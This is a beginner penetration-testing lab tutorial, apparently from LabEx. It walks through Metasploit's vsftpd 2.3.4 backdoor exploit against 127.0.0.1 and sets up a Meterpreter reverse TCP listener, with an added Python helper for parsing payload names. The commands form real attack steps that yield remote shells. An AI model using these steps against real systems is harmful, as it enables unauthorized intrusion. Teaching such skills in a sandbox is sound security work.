Kali Exploitation with Metasploit


Introduction

In this lab, you will learn the basics of penetration testing using Kali Linux within a controlled environment on the LabEx VM. The focus is on leveraging the powerful Metasploit Framework to identify vulnerabilities, configure payloads, execute exploits, and interact with compromised systems through a Meterpreter session. Designed for beginners, this lab guides you step by step through essential cybersecurity techniques in a safe and structured manner. When you open the terminal, you will be automatically connected to the Kali Linux container's shell, ready to start practicing without needing to manually start or enter the container.

Starting Metasploit Framework

In this first step, you will launch the Metasploit Framework, a key tool for penetration testing in Kali Linux. This step is essential as it sets up the environment for identifying and exploiting vulnerabilities in later steps.

When you open the terminal in the LabEx VM, you will be automatically connected to the Kali Linux container's shell. There is no need to manually start the container or enter the shell; the environment is already configured for you.

Before using Metasploit, you need to ensure it is installed in the Kali Linux container. First, update the package list by typing the following command in the terminal and pressing Enter:

apt update

Next, install the Metasploit Framework. This installation may take a few minutes, so please wait for it to complete.

apt install -y metasploit-framework

Once installed, start the Metasploit console by typing the following command and pressing Enter:

msfconsole

The first time you run this command, it might take a moment to initialize as it sets up the database and loads modules. You will see an ASCII art banner and a prompt similar to this when Metasploit starts:

Metasploit Framework
...
msf6 >

The msf6 > prompt indicates that you are now inside the Metasploit console, ready to interact with the framework. Do not exit the console, as you will use it in the next step to search for and select an exploit.

Searching and Selecting an Exploit

Now that you have started the Metasploit Framework, the next step is to search for and select an exploit. An exploit is a piece of code that takes advantage of a software vulnerability to cause unintended behavior, such as gaining unauthorized access.

Since you are already in the Metasploit console (with the msf6 > prompt), let's search for an exploit related to FTP (File Transfer Protocol), a common service that can have vulnerabilities. Type the following command and press Enter:

search ftp

This command lists exploits and auxiliary modules related to FTP. The output will show a table of matching modules.

Matching Modules
================

   ##  Name                                           Disclosure Date  Rank       Check  Description
   -  ----                                           ---------------  ----       -----  -----------
   0  exploit/unix/ftp/vsftpd_234_backdoor          2011-07-03       excellent  No     VSFTPD v2.3.4 Backdoor Command Execution
   1  auxiliary/scanner/ftp/ftp_version                              normal     No     FTP Version Scanner
   2  auxiliary/scanner/ftp/anonymous                                normal     No     FTP Anonymous Access Scanner
...

For this lab, we will use the vsftpd_234_backdoor exploit. To select it, use the use command followed by the exploit's name.

use exploit/unix/ftp/vsftpd_234_backdoor

After selecting the exploit, your prompt will change to include the exploit's name, indicating it is now the active module.

msf6 exploit(unix/ftp/vsftpd_234_backdoor) >

To view detailed information about the selected exploit, including its options and requirements, type the info command.

info

The output provides details such as the platform, architecture, and available targets.

       Name: VSFTPD v2.3.4 Backdoor Command Execution
     Module: exploit/unix/ftp/vsftpd_234_backdoor
   Platform: Unix
       Arch: cmd
 Privileged: Yes
    License: Metasploit Framework License (BSD)
       Rank: Excellent
  Disclosed: 2011-07-03

You have now successfully selected an exploit. In the next step, you will configure a payload for this exploit.

Note: Labby cannot capture the operation records from the msf shell, so the following steps will not be verified.

Configuring the Exploit and Payload

With the exploit selected, you now need to configure its options and set a payload. A payload is the code that will run on the target system after the exploit is successful. For this lab, you will configure an interactive command shell payload that allows you to execute commands on the target system.

Important: Before setting a payload, it's crucial to check which payloads are compatible with your selected exploit. Use the following command to see all compatible payloads:

show payloads

This will display a list of payloads that work with the vsftpd_234_backdoor exploit. You should see only one compatible payload: cmd/unix/interact.

Now set the payload. We will use the interactive command shell that is compatible with this exploit. The payload name cmd/unix/interact follows a specific structure: <architecture>/<platform>/<type>. Here, cmd indicates a command shell architecture, unix specifies the target platform, and interact means it will provide an interactive session.

set payload cmd/unix/interact

You will see a confirmation message.

payload => cmd/unix/interact

Next, you need to configure the exploit options. The RHOST (Remote Host) option specifies the IP address of the target machine. For this simulation, we will set it to 127.0.0.1.

set RHOST 127.0.0.1

Important Note: Unlike reverse shell payloads, the cmd/unix/interact payload does not require LHOST or LPORT settings. This payload establishes an interactive command session directly with the target.

To verify all the settings, use the show options command.

show options

This displays a table of options for the exploit. The target appears in the table as RHOSTS (current Metasploit versions accept RHOST as an alias for it); check that it shows 127.0.0.1 and that RPORT is 21, the standard FTP port.

Module options (exploit/unix/ftp/vsftpd_234_backdoor):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOSTS   127.0.0.1        yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT    21               yes       The target port (TCP)

Your exploit and payload are now configured and ready for execution in the next step.

Executing the Exploit

Having configured the exploit and payload, you are now ready to execute it. The exploit command instructs Metasploit to launch the attack against the specified target (RHOST).

In your Metasploit console, simply type the following command and press Enter:

exploit

Metasploit will attempt to run the exploit. Since there is no actual vulnerable VSFTPD service running on 127.0.0.1 in this lab environment, the exploit will fail. This is expected and demonstrates the process of launching an attack.

The output will show that Metasploit attempted to connect to the target FTP service but failed because the service is not running:

[-] 127.0.0.1:21 - Exploit failed [unreachable]: Rex::ConnectionRefused The connection was refused by the remote host (127.0.0.1:21).
[*] Exploit completed, but no session was created.

Note: With the cmd/unix/interact payload, you would not see a reverse shell listener being started. Instead, this payload would attempt to establish a direct interactive command session with the target FTP service if it were vulnerable and accessible.

The message Exploit completed, but no session was created confirms the failure. In a successful scenario with a vulnerable VSFTPD service, this would establish an interactive command shell session, allowing you to execute commands directly on the target system. This step teaches you the fundamental command for launching an exploit, which is a core part of the penetration testing workflow.

Setting Up a Meterpreter Listener

In this final step, you will learn to set up a listener for a Meterpreter payload. Meterpreter is an advanced, feature-rich payload that provides an interactive shell on the target system. Instead of launching an exploit, you will use the exploit/multi/handler module to listen for incoming connections. This is useful when an exploit is delivered through other means (e.g., a malicious file) and you need to catch the reverse connection.

First, switch to the multi/handler module.

use exploit/multi/handler

Your prompt will change to reflect the new module.

msf6 exploit(multi/handler) >

Next, set a Meterpreter payload. We will use one designed for Linux systems. The payload name linux/x86/meterpreter/reverse_tcp follows a logical structure: <platform>/<architecture>/<type>/<protocol>. It specifies a Linux platform, x86 architecture, a Meterpreter payload type, and a reverse TCP connection protocol.

set payload linux/x86/meterpreter/reverse_tcp

Now, configure the listener options with the set command: LHOST is the address Metasploit listens on and LPORT is the port. Unlike the cmd/unix/interact payload used earlier, a reverse TCP payload requires both.

set LHOST 127.0.0.1

Note: You may see a warning message about binding to a loopback address. This is normal when using localhost (127.0.0.1) and can be safely ignored for this lab.

set LPORT 4444

Finally, start the listener using the exploit command.

exploit

Metasploit will start a listener on the specified IP and port, waiting for a Meterpreter session to connect.

[*] Started reverse TCP handler on 127.0.0.1:4444

The console will remain active, waiting for a connection. In a real scenario, if a target machine executed the corresponding Meterpreter payload, a session would be established here. Since no target will connect in this lab, you can stop the listener by pressing Ctrl + C.

To exit the Metasploit console, type exit and press Enter.
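To make the two payload naming conventions explained in the Configuring and Listener steps concrete, here is an added Python example (not part of the LabEx lab or of Metasploit itself) that classifies a payload name and reports which listener options must still be set before typing exploit. The helper names and the ARCHS list are assumptions of this example, and it goes beyond the lab by also handling stageless and bind payloads.

```python
"""Infer a Metasploit payload's connection model and listener options from its name."""
from dataclasses import dataclass
# Hardware archs seen as the second path element; scripting platforms (php/, python/) have none.
ARCHS = {"x86", "x64", "aarch64", "armle", "armbe", "mipsle", "mipsbe", "mips64", "ppc", "ppc64"}

# Listener-side options each connection model needs before `exploit` will run.
OPTIONS_BY_MODEL = {
    "reverse": frozenset({"LHOST", "LPORT"}),  # target connects back to the handler
    "bind": frozenset({"LPORT"}),               # handler connects to a port the target opens
    "direct": frozenset(),                      # session rides on the exploit's own socket
}

@dataclass(frozen=True)
class PayloadInfo:
    platform: str
    arch: str
    kind: str         # meterpreter, shell, interact, ...
    model: str        # reverse, bind or direct
    staged: bool
    listener_options: frozenset

def parse_payload(name: str) -> PayloadInfo:
    """Split a payload path into its naming components (hypothetical helper)."""
    parts = name.strip().split("/")
    if len(parts) < 3 or not all(parts):
        raise ValueError(f"not a payload name: {name!r}")
    if parts[0] == "cmd":            # cmd/<platform>/<type>, as in cmd/unix/interact
        arch, platform, rest = parts[0], parts[1], parts[2:]
    elif parts[1] in ARCHS:          # <platform>/<arch>/<type>/<protocol>
        platform, arch, rest = parts[0], parts[1], parts[2:]
    else:                            # <platform>/<type>/<protocol>, e.g. windows/meterpreter/reverse_tcp
        platform, arch, rest = parts[0], "", parts[1:]
    staged = len(rest) > 1           # meterpreter/reverse_tcp (staged) vs meterpreter_reverse_tcp
    tokens = rest[-1].split("_")
    model = next((t for t in tokens if t in ("reverse", "bind")), "direct")
    if staged:
        kind = rest[0]
    elif model == "direct":
        kind = rest[-1]
    else:                            # stageless, e.g. meterpreter_reverse_tcp or reverse_bash
        kind = "_".join(tokens[:tokens.index(model)]) or "shell"
    return PayloadInfo(platform, arch, kind, model, staged, OPTIONS_BY_MODEL[model])

def missing_options(name: str, datastore: dict) -> set:
    """Listener options the payload needs that are still unset in the datastore."""
    return {opt for opt in parse_payload(name).listener_options if not datastore.get(opt)}

if __name__ == "__main__":  # constructed datastores mirroring the two configurations in this lab
    for name, store in [("cmd/unix/interact", {"RHOSTS": "127.0.0.1"}),
                        ("linux/x86/meterpreter/reverse_tcp", {"LHOST": "127.0.0.1"})]:
        print(name, parse_payload(name).model, "missing:", sorted(missing_options(name, store)))
```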

Summary

In this lab, you have learned the fundamental steps of penetration testing using Kali Linux and the Metasploit Framework. You started by launching Metasploit, searched for and selected an exploit, configured both the exploit and an interactive command shell payload, and executed the attack in a simulated environment. You also learned how to set up a standalone listener for an advanced Meterpreter payload. These steps provide a practical introduction to the core workflow of identifying vulnerabilities, preparing payloads, and understanding the exploitation process. By following this structured approach, you have gained hands-on experience with essential cybersecurity tools and techniques.